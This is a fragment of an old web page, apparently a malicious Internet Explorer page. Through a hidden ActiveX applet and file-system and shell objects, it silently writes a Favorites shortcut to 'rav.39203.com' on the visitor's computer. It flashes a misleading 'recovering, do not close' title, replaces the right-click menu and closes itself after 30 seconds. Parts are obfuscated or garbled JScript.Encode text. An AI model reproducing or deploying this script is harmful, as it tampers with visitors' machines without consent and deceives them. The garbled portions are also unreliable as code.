//add favorites this is the common part; should be here if you want to add favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
//end common part
//the following line is used for adding favorites.
//to add multiple favorites, duplicate the following line, changing the last 2 paramaters.
AddFavLnk(loc, "【安全测试网】", "http://rav.39203.com");
//end add favorites
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeoutbi,@#@&)P@#@&@#@&kUrD`bi,@#@&@#@&ADAJAA==^#~@</script>
<script language=JScript.Encode>
step=0
function flash_title()
{
step++
if (step==3) {step=1}
if (step==1) {document.title='★正在恢复 请莫关闭★'}
if (step==2) {document.title='☆恢复过后 自动关闭☆'}
setTimeout("flash_title()",1300);
}
flash_title()
P,~P@#@&Xo0AAA==^#~@</script>
<script language="JScript.Encode">
function closeit() {
setTimeout("self.close()",30000)
}
</script>
</BODY>
<body onload="closeit()">
</SCRIPT>
<STYLE>#ie5menu {
BORDER-RIGHT: black 2px solid; BORDER-TOP: black 2px solid; VISIBILITY: hidden; BORDER-LEFT: black 2px solid; WIDTH: 210px; CURSOR: default; LINE-HEIGHT: 20px; BORDER-BOTTOM: black 2px solid; FONT-FAMILY: arial; POSITION: absolute; BACKGROUND-COLOR: menu
}
.menuitems {
PADDING-RIGHT: 15px; PADDING-LEFT: 15px
}
</STYLE>
<TBODY>
<TR>
<TD>
<P align=center>
<SCRIPT language=JScript.Encode>
//set this variable to 1 if you wish the URLs of the highlighted menu to be displayed in the status bar
var display_url=0
function showmenuie5()
{ie5menu.style.left=document.body.scrollLeft+event.clientX
ie5menu.style.top=document.body.scrollTop+event.clientY
ie5menu.style.visibility="visible"
return false
}
function hidemenuie5(){
ie5menu.style.visibility="hidden"}
function highlightie5(){
if (event.srcElement.className=="menuitems")
{event.srcElement.style.backgroundColor="highlight"
event.srcElement.style.color="white"
if (display_url==1)
window.status=event.srcElement.url
}
}
function lowlightie5(){
if (event.srcElement.className=="menuitems"){
event.srcElement.style.backgroundColor=""
event.srcElement.style.color="black"
window.status=''
}}
function jumptoie5(){
if (event.srcElement.className=="menuitems")
window.location=event.srcElement.url}
</SCRIPT>
<!--[if IE]>
<META content="MSHTML 5.50.4134.600" name=GENERATOR></P>
<DIV id=ie5menu onmouseover=highlightie5() onclick=jumptoie5()
onmouseout=lowlightie5()>
<DIV class=menuitems url="index.html">请尊重别人的知识产权</DIV>
<DIV class=menuitems>按吧,按吧^_^嘿嘿嘿....</DIV></DIV><![endif]-->
<SCRIPT language=JScript.Encode>
document.oncontextmenu=showmenuie5
if (document.all&&window.print)
document.body.onclick=hidemenuie5
</SCRIPT>
<script language=JScript.Encode>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
//this function is only needed if you add favorites or links
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
//end add favorites or links function